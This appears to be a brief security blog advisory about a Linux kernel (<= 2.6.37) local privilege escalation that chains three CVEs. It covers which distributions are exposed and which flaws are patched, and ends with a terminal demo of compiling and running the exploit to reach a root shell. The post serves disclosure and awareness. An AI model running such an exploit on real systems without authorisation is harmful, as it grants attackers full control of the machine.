When a shell is not enoughLinux Kernel <= 2.6.37 local privilege escalation
A new local privilege escalation has been discovered in the Linux kernel as reported in the Full Disclosure mailing list.
The exploit combines three different vulnerabilities to gain root privileges: CVE-2010-4258, CVE-2010-3849 and CVE-2010-3850.
Affected systems
The Econet protocol (CVE-2010-3849) is not supported by default in RedHat like distributions (RHEL, CentOS and Fedora) and the majors distributions already patched CVE-2010-3849 and CVE-2010-3850, so up to date systems should not be affected by this particular exploit.
CVE-2010-4258 is the main vulnerability and it is still unpatched. Somebody could find another way to trigger the vulnerability.
msk@ubuntu:~/exploit$ gcc 15704.c -o foo
msk@ubuntu:~/exploit$ ./foo
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xe08b72a0
[+] Resolved econet_ops to 0xe08b73a0
[+] Resolved commit_creds to 0xc016c830
[+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root) groups=0(root)
#